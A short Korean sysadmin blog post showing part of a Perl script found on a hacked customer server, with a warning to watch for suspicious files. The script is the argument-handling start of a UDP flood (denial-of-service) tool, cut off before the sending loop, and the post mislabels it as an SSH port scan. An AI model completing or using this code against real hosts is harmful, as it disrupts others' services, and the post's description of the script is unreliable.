Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
ssh port scan 소스 중 일부이다. 해킹당한 고객사 서버 점검 중 발견..(하여간 보안에 제발 좀 신경써라… 귀찮아 죽겠다-_-;)
스크립트를 다 올리기엔 좀 그렇고-_-; 뭐 이런 정도는 인터넷 뒤지면 금방나온다.
혹시나 엄한 권한의 텍스트 파일이 발견되면 바로바로 조치합시다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
#!/usr/bin/perl use Socket; $ARGC=@ARGV; if ($ARGC !=3) { printf "$0 <ip> <port> <time>\n"; printf "if arg1/2 =0, randports/continous packets.\n"; exit(1); } my ($ip,$port,$size,$time); $ip=$ARGV[0]; $port=$ARGV[1]; $time=$ARGV[2]; socket(crazy, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$ip"); printf "cof flood ... \n"; if ($ARGV[1] ==0 && $ARGV[2] ==0) { goto randpackets; } if ($ARGV[1] !=0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 udp) &"); goto packets; } if ($ARGV[1] !=0 && $ARGV[2] ==0) { goto packets; } if ($ARGV[1] ==0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 udp) &"); goto randpackets; } packets: ~ |
참고 : http://blog.naver.com/yunki798?Redirect=Log&logNo=40015444064